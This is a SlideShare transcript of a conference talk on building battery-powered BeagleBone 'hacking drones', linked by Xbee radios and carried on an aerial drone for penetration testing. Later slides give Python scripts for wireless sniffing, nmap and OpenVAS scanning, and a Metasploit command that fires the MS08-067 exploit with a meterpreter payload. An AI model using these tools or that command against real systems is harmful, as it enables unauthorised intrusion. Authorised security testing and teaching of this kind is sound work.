Your SlideShare is downloading. ×
0
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Autonomous Remote Hacking Drones - Dr. Phil Polstra
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Autonomous Remote Hacking Drones - Dr. Phil Polstra

1,515

Published on

Are you tired of running pentests from a van outside your target? Working 24x7 hunched over your laptop got you down? Wouldn't you rather drop a few hacking devices outside/inside your target and …

Are you tired of running pentests from a van outside your target? Working 24x7 hunched over your laptop got you down? Wouldn't you rather drop a few hacking devices outside/inside your target and monitor the test poolside at your hotel down the street? This talk will show you how to build inexpensive hacking drones that can be controlled from up to a mile away and can be run for days on batteries. Devices can be used as pentesting desktops, hacking drones, or dropboxes with no software changes. Drone costs range from $45-$85. All hardware and software used is open source.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,515
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
13
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Dr. Phil Polstra @ppolstra Bloomsburg University of Pennsylvania Autonomous Remote Hacking Drones
  • 2. What is this talk about? l Hacking and/or forensics with small, low-power devices l ARM-based Beagleboard & Beaglebone running full suite of security/forensics tools l Performing coordinated attacks with networks of devices l Using aerial drones for performing and supporting attacks l Leveraging Python to make attack semi-autonomous
  • 3. Why You Should Care l A full-featured Linux install for flexibility l Low-power devices can run for days on battery power l Small devices can be planted for later retrieval l Network of devices enhances hacking from a distance l Aerial drone can be flown around target l Can be useful for initial reconnaissance l May be only practical way to access certain targets l Aerial drone can be landed nearby (roof?) l Remote hacking drone l Router for other drones planted nearby l Combination router and drone
  • 4. Who am I? l Professor at Bloomsburg University of Pennsylvania l Programming from age 8 l Hacking hardware from age 12 l Also known to fly and build airplanes
  • 5. 5 Roadmap l Choosing a hacking platform l Aircraft choices l The Deck – your new favorite pen testing distro l Solo ops with The Deck l Networking with 802.15.4 l Building Drones l Attacking with an army of devices running The Deck l Aerial drone scenarios l Making attacks more autonomous with Python
  • 6. 6 Choosing a Hacking Platform l Small l Low-power l Affordable l Mature l Networking built in l Good USB support l Convenient input and output
  • 7. 7 And the Winning Platform is... l BeagleBone Black l 3.4” x 2.1” l <10 Watts (board itself <2 W) l Only $45 l Based on 1GHz Cortex A8 l 512MB RAM l 100 Mbps Ethernet built in l high-speed USB plus USB-on-the-go l HDMI and LCD output l RS-232, webcam, plentiful GPIO, and microSD
  • 8. BeagleBone Black (aka Raspberry Pi killer)
  • 9. I know at least one of you will ask... l Why not Raspberry Pi? l Not as powerful l Doesn't run Ubuntu (ARM6 not supported) l Not truly open (Broadcom won't release info) l Not as mature l Raspberry Pi cost more to build full system l Still limited availability (especially in USA) l Not as reliable (reported quality and power issues) l Inefficient – uses more power despite running at lower clock speed l Limited GPIO l GPIO is not buffered (easy to fry boards) l Fragile design (pins vs. headers) l Not as compact
  • 10. 10 Choosing an Aircraft l Good payload l Can fly in windy conditions l Capable of vertical takeoff/landing (VTOL) l Reasonable flight time l Space for BeagleBone Black l Space for Xbee l Space for Alfa wifi adapter l Affordable
  • 11. 11 And the winning aircraft is...
  • 12. 12 Quadshot l Flying wing with VTOL l Good wind tolerance l Half a pound of payload l Flight as an airplane is more energy efficient and helps in high winds (8-15 minutes) l Some models use Xbee l Built in camera mount
  • 13. The Deck – Your New Favorite Distro l Originally developed for BeagleBoard-xM l Ported to run on BeagleBone Black l Optimized for the Beagles l Not someone's half-way effort to port desktop distro l Desktop or drone l All the packages you need (over 1600) l Based on Ubuntu l Good repository support l Good community support l Minimizes need to build tools from source l Running latest kernels
  • 14. 14 Demo 1 – Our Favorite Exploit
  • 15. 15 Demo 1 (contd.)
  • 16. 16 Demo 1 (contd.)
  • 17. 17 Demo 2 – Wifi Cracking
  • 18. 18 Demo 2 (contd.)
  • 19. 19 Demo 2 (contd.)
  • 20. 20 Demo 3 – Password Cracking
  • 21. 21 Demo 4 – WPS Cracking
  • 22. 22 Demo 4 (contd.)
  • 23. Demo 5 – Pwn Win7 Like Its a Mac
  • 24. 24 Demo 5 (contd.)
  • 25. 25 Demo 6 – Clickiddiestm
  • 26. 26 802.15.4 Networking l Basics l Hardware l Simple case: 2 Xbee adapters l Slightly harder case: multiple adapters one at a time l Hard case: multiple adapters simultaneously l Really Hard case: true mesh network
  • 27. 27 802.15.4 Basics l Typically used in low-power embedded systems l Regular (300') and Pro (1 mi) versions l AT and API modes of operation l Low-speed (250 kbps max) l Supports multiple network topologies l Peer to Peer l Star l Mesh
  • 28. 28 Xbee Hardware
  • 29. 29 Xbee Hardware (contd) l Manufactured by Digi l Regular and Pro formats are interchangeable and inter-operable l Power consumption at 3.3V is 50/295 mA for regular/pro l Uses 2 mm pin spacing l Most breadboards are 0.1” or 2.54 mm l Requires an adapter l Several antenna options l Be careful not to mix S1 with S2 (ZB) series which are the same dimensions, but are not compatible
  • 30. 30 Series 1 vs. Series 2 l Series 1 (the original) l Slightly higher power consumption (50 vs 40 mA) for regular version l Works out of the box l Not true mesh networking l Series 2 (2B and ZB) l Must have firmware loaded for each function (coordinator, router, end device) l Every network must have a coordinator l Coordinators and routers may not go to sleep l Recommended for larger pen tests
  • 31. Simple Case: 2 Xbee Adapters l Xbee modules must be configured for desired network topology l Digi provides X-CTU software for configuration, but it only runs on Windows (or use Wine) l Recently Moltosenso has released Network Manager IRON 1.0 which runs on Linux, Mac, and Windows – free edition is sufficient for our limited usage
  • 32. 32 Configuring Xbee Modules l Place Xbee module in USB adapter and connect to PC running X-CTU or IRON l Select correct USB port and set baud rate (default is 9600) l From Modem Configuration tab select Read to get current configuration l Ensure modem is XB24 and Function Set is XBEE 802.15.4 for Series 1 l Set the channel and PAN ID (1337?) noting the settings which must be the same for all modems l Pick a Destination Low and Destination High address for the other adapter (say 2 and 0) l Set the My Address to a chosen value (say 01) l Click Write to stored the new config on the Xbee l Repeat this process on the second Xbee but reverse the addresses l The modules should now talk to each other just fine
  • 33. Configuring Xbee Modules (contd)
  • 34. 34 Simple Case: Accessing your single drone l By default Xbee adapters operate in transparent mode l Setup TTY on drone and you can login in with terminal program l Simple l Works with interactive programs l If you go out of range you are still connected when you return
  • 35. 35 Starting TTY on your drone l Create a file with the following in /etc/init # ttyO2 - getty # This service maintains a getty on ttyO2 from the point the system is # started until it is shut down again. start on stopped rc RUNLEVEL=[2345] stop on runlevel [!2345] respawn exec /sbin/getty -8 57600 ttyO2 l Start with “sudo start ttyO2” (letter O not a zero!) l Use favorite terminal program to connect
  • 36. 36 Slightly Harder Case: Multiple Drones One at a Time l Configure drones as with the single drone case but with different MY addresses l Use terminal program on command console to connect to drones one at a time l Simple: no programming required l Must enter AT command mode to switch between drones l Enter “+++” (no enter) and wait for OK l Enter “ATDL0002 <enter>” to select drone 2 l Enter “ATWR <enter>” to write to NVRAM l Enter “ATCN <enter>” to exit command mode
  • 37. 37 Slightly Harder Case: Multiple Drones Simultaneously l API mode is used vs. AT mode l Configure Xbee with X-CTU l For Series 1 stick with 802.15.4 Function Set l For Series 2 (ZB) l Drones set to Function Set ZNET 2.5 ROUTER/ENDDEVICE API 1347 l Controller set to Function Set ZNET 2.5 COORDINATOR API 1147 l Router can be used to extend range to command console l Multiple choices for communication l Java xbee-api l Python-xbee (what I used) l Raw commands to TTY device l Recommended for most situations involving 3 or more devices
  • 38. 38 Multiple Drone Communications l Really this is a point-to-multipoint topology l For each drone communication appears to be simple peer-to-peer l API mode provides better performance and allows simpler software operation
  • 39. 39 Multiple Drones Using Python: One Possibility l Each drone runs a simple Python script which waits for commands and sends announcements l Controller listens for announcements/responses and sends commands (all activity is logged) l Upside is that it lends itself easily to scripting l Downside is that it doesn't support interactive shells (yet) l Announcements can be sent to controller for important events (such as successful cracking) l Code is available at https://github.com/ppolstra
  • 40. 40 Harder Case: True Mesh Network l Recommended when using larger number of drones or when devices are too far apart l Devices configured as routers or coordinators will have reduced battery life (no sleep) l Requires series 2 (2B or ZB) Xbee adapters l No changes to scripts are required
  • 41. 41 True Mesh Networking (contd) l At least one modem must have coordinator firmware l Routers can extend range l Pro adapters recommended l Drones can use regular adapters to save power l Routers need not be connected to a Drone l Easier to leverage Xbee adapter sleep modes on end devices
  • 42. 42 Building Drones
  • 43. 43 Getting The Deck l Download the archive from http://sourceforge.net/projects/thedeck/ l Also download the MeshDeck if using 802.15.4 l Note apt archives removed to save 1.7GB of space l Upload The Deck to microSD card l Class 10 8GB or larger l Extract archive to your Linux box l From your Linux box “sudo ./setup_sd.sh –mmc /dev/sdX –uboot bone” l Will take a while (20-30 minutes) l Ready to run microSD cards are also available at https://specialcomp.com/beagleboard/thedeck.htm l If running the MeshDeck l Extract the archive to the drone l
  • 44. 44 Power Your Drones l Beagles take standard 2.1 x 5.5 mm barrel connector l Battery voltage above 5V is wasted as heat l Bare board can run for several days off standard batteries (~220mA) l LCD touchscreens require lots of power! l Leaching off of USB power from a target is ideal l Be careful with WiFi and 802.15.4 l Set transmit power to minimum l Take advantage of sleep modes on 802.15.4 radios
  • 45. 45 Power Options Battery Size Approx. Runtime D 54.5 hrs C 27.3 hrs AA 13.6 hrs 9V or AAA 6.8 hrs Latern 50 hrs USB 5200 23.6 hrs
  • 46. 46 802.15.4 Hardware
  • 47. 47 802.15.4 Hardware
  • 48. 48 Xbee Adapters l UART (serial) adapters l Can be wired directly to Beagles using 4 wires l Don't take up USB ports l Xbee cape out soon
  • 49. 49 Xbee Adapters (contd) l USB Adapters l More expensive l Helpful for initial setup of modem l Easier to setup: just plug it in l Laptop connection
  • 50. 50 Wiring the Xbee to Beagles If you splurged for the USB adapter you can just plug in to a USB port l BeagleBone has only 1 USB port which you might want for something else (WiFi?) l BeagleBoard has 4 USB ports l Using the UART interface slightly more complicated l Connect 4 wires: 3.3V, Ground, TX, RX l Configure the Beagle multiplexer for proper operation l If you have an Xbee cape just plug it in
  • 51. 51 Setting up a UART Interface l Appropriate pins & modes in Beagle manuals l For BeagleBone UART2 l 3.3V & Ground P9 pin 3 & 1, respectively l TX P9 pin 21 (to Xbee Din) l RX P9 pin 22 (to Xbee Dout) l Add the following lines to /etc/rc.local BEFORE the exit 0 at the end: l # setup the MeshDeck drone l echo BB-UART2 > /sys/devices/bone_capemgr.8/slots l sleep 2 l /etc/init.d/meshdeckd start
  • 52. 52 Capes l Work in progress l Xbee cape with socket for Xbee radio l Pwnage cape l Xbee socket l Network switch for installing inline l USB hub l Optional 802.11 wireless l AirDeck cape to fly aerial drone
  • 53. 53 Containers
  • 54. 54 Containers
  • 55. 55 Plantables
  • 56. 56 Plantables
  • 57. 57 Building the AirDeck l If you only want a router to extend range l Buy the Xbee board from Transition Robotics l Program the Xbee modem as a router l Install the board l To install a drone on the Quadshot will need l BBB l Xbee modem l Xbee cape (either DIY or purchased) l Alfa AWUS036H wireless adapter l 2.1 x 5.5 mm barrel connector for power l Short (3-6”) microUSB A-B cable
  • 58. 58 AirDeck (contd) l Entire setup installed on brain cover l Place BBB on cover as shown mark 4 hole locations with 1/8” drill bit l Connect to lid using 4-40 screws and standoffs or similar l 3 nuts per screw l 1 on outside to secure screw l 2 to lock BBB on lid
  • 59. 59 AirDeck (contd) l Remove the BBB from the lid l Take the Alfa out of its case l Test fit it to the inside of the cover as shown l Mark the location of 3/8” hole for antenna l Drill the 3/8” hole then install on lid to mark mount holes l Drill mount holes l Install with 4-40 screws l Seal with black tape to prevent shorting with LIA board
  • 60. 60 AirDeck (contd) l Cut notches for power cable and USB cable as shown in pictures using rotary tool l You may have to cut back the hard plastic and/or metal shield on USB cable l Solder the 2.1 x 5.5 barrel connector l Center is connected to Vcc on LIA l Outer conductor is connected to Ground on LIA l UART connectors on upper left are probably best choice for connection l Install Xbee cape and secure with cable ties l Install lid and plug in barrel connector l Go forth and pwn!
  • 61. 61 AirDeck Ready for Pwnage
  • 62. Networked attacks – Simplest Case l In the simplest case there is only 1 drone l Networking is peer-to-peer l Allows hacking from a distance l Better WiFi hacking when drone is in building l Drone runs 24x7 l Drone can run for days off battery l Important updates such as successfully cracked passwords can be sent to master periodically in case you weren't in range when they happened l Drone has full version of The Deck – lots of possibilities l Less conspicuous than sitting outside the building l If you are lucky you can patch into wired network l If you are extra lucky they use Power Over Ethernet!
  • 63. 63 Networked Attack with Multiple Drones l One process on master monitors status updates from all drones l Interactive shell into each drone l Multiple subshells can be created l Processing continues if master disconnects l Endless possibilities since each drone has full version of The Deck l Drone are easily retasked based on objectives achieved by other drones
  • 64. 64 Demo 7 - Trivial example of Two Drones in TTY Mode
  • 65. 65 Demo 8 - Trivial Example with Two Drone – API Mode Using Python
  • 66. 66 Python Mode (continued)
  • 67. 67 Python Mode (continued)
  • 68. 68 Python Mode (continued)
  • 69. 69 AirDeck Scenario 1 l Router only mode l Used to extend the range of drones planted nearby target l Drones may be using regular Xbee adapters to save power l Flyby if there are no good landing spots nearby l Land if possible l Flat roof could be good choice l Router can run for days off Quadshot battery
  • 70. 70 AirDeck Scenario 2 l AirDeck is only drone l Useful when drones can't be easily planted l Battery on Quadshot allows extended operation l Best situation allows you to land on a roof where the AirDeck isn't detected l If you screw up and crash on the roof you may still be able to retrieve “your RC toy” from target later
  • 71. 71 AirDeck Scenario 3 l AirDeck combined with other drones l Other drones are planted l Inside leeching power from target l Outside running off of battery l Other drones likely using regular Xbee adapters to save power l AirDeck Xbee adapter configured as a coordinator or router
  • 72. Automating with Python
  • 73. from scapy.all import * # create a list to store networks ap_list = [] # define a function to be called with each received packet def packet_handler(pkt) : # is this a (802.11) packet, in particular a beacon frame if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 8 : # is this a network that I used to know? if pkt.addr2 not in ap_list : ap_list.append(pkt.addr2) print "Network %s with ESSID %s detected on channel %s " % (pkt.addr2, pkt.info, str(ord(pkt[Dot11Elt:3].info))) # main function sniffs for a minute then exits def main() : print "Sniffing for wireless networks" sniff(iface="mon0", prn=packet_handler, timeout=60) print "All done" if __name__ == '__main__' : main() Detecting Wireless Networks
  • 74. from scapy.all import * import optparse # create a list to store networks client_list = [] pkt_list = [] # define a function to be called with each received packet def packet_handler(pkt) : # is this a (802.11) packet, in particular a beacon frame if pkt.haslayer(Dot11) : pkt_list.append(pkt) # is this a client that I used to know? if pkt.addr2 not in client_list : client_list.append(pkt.addr2) print "Client: " + str(pkt.addr2) + " detected" Capturing Wireless Packets
  • 75. def main() : # parse command line options parser = optparse.OptionParser('usage %prog -b <BSSID> -e <ESSID>') parser.add_option('-b', dest='bssid', type='string', help='target BSSID') parser.add_option('-e', dest='essid', type='string', help='target ESSID') (options, args) = parser.parse_args() bssid = options.bssid essid = options.essid # if essid and bssid aren't specified exit if (essid == None ) | (bssid == None): print parser.usage exit(0) print "Capturing traffic for ESSID:%s BSSID:%s" % (essid, bssid) sniff(iface="mon0", prn=packet_handler, timeout=60) pktcap = PcapWriter(essid + '.pcap', append=True, sync=True) pktcap.write(pkt_list) pktcap.close() print "All done" exit(0) if __name__ == '__main__' : main() Capturing Wireless Packets(contd)
  • 76. Finding Out What’s Thereimport nmap, optparse, json ihost_list = [] def main() : # parse command line options parser = optparse.OptionParser('usage %prog -t <target host or network> -p <ports> -o <nmap options>') parser.add_option('-t', dest='target_net', type='string', help='target host or network') parser.add_option('-o', dest='nmops', type='string', help='additional nmap options') parser.add_option('-p', dest='ports', type='string', help='port(s) to scan') (options, args) = parser.parse_args() target_net = options.target_net nmops = options.nmops ports = options.ports # if no target is specified then exit if target_net == None : print parser.usage exit(0) # now perform the scan nm = nmap.PortScanner() # if arguments and ports aren't specified use some defaults if ports == None : ports = '1-1024' if nmops == None : nmops = '-sV -O' nm.scan(target_net, ports, nmops)
  • 77. Finding Out What’s There (contd) #print the results for host in nm.all_hosts() : # if it isn't up don't bother to print anything about it if nm[host]['status']['state'] == 'up' : host_list.append(nm[host]) print '---------------------------------' if nm[host].has_key('addresses') : print "live host detected at %s " % (nm[host]['addresses']['ipv4']) else : print "live host detected at %s " % (nm[host]['hostname']) # now iterate over services if 'tcp' in nm[host].keys() : print 'TCP services detected on the following ports:' for port in nm[host]['tcp'] : print "Port: " + str(port) for k, v in nm[host]['tcp'][port].items() : print " " + str(k) + ": " + str(v) if 'udp' in nm[host].keys() : print 'UDP services detected on the following ports:' for port in nm[host]['udp'] : print "Port: " + str(port) for k, v in nm[host]['udp'][port].items() : print " " + str(k) + ": " + str(v) fp = open('nmap-scan.json', 'wb') json.dump(host_list, fp) fp.close() if __name__ == '__main__' :
  • 78. import optparse, json, time, xml.etree.ElementTree as ET host_list = [] def main() : # parse command line options parser = optparse.OptionParser('usage %prog -u <OpenVAS user> -p <OpenVAS password> -h <OpenVAS host>') parser.add_option('-u', dest='user', type='string', help='OpenVAS user') parser.add_option('-h', dest='ovhost', type='string', help='OpenVAS host, default is localhost') parser.add_option('-p', dest='password', type='string', help='OpenVAS password') (options, args) = parser.parse_args() user = options.user password = options.password ovhost = options.ovhost # if no user specified then exit if user == None : print parser.usage exit(0) if ovhost == None : ovhost = 'localhost' # load the host list from JSON file fp = open('nmap-scan.json', 'rb') host_list = json.load(fp) Detecting the Vulnerable
  • 79. Detecting the Vulnerable (contd) # create the list of targets from nmap scan results targets = "" for host in host_list : targets += str(host['addresses']['ipv4']) + ',' targets = rstrip(targets, ',') # now do the scan manager = openvas.omplib.OMPClient(host=ovhost) manager.open(user, password) manager.create_target('nmap-targets', targets, 'targets detected by previous nmap scan') task_id = manager.create_task('openvas-scan', target='nmap-targets') report_id = manager.start_task(task_id) # it will take some time for this scan to run so check every minute while True : time.sleep(60) status = manager.get_task_status(task=task_id) if "done" in status.itervalues() : break report = manager.get_report(report_id) print ET.tostring(report) if __name__ == '__main__' : main()
  • 80. General format msfcli /exploit/platform/type/exploit RHOST=<target address> PAYLOAD=platform/payload/bind_method OPTIONX=something OPTIONY=something l I.E. msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.10.103 PAYLOAD=windows/meterpreter/bind_tcp Script-based Exploitation
  • 81. 81 Future Directions l Continue to add useful packages as need arises l Optimize some packages for BB-xM/BBB l Optimize and expand 802.15.4 code l Other output devices l Exploit USB OTG functionality l Replace LIA autopilot with BBB in AirDeck drone l Hack over the Internet with 802.15.4 gateway
  • 82. 82 Coming Soon Use coupon Code CNF314 For 30% off This and ANY Syngress title ..
  • 83. Questions? Feel free to track me down during the con or @ppolstra later

×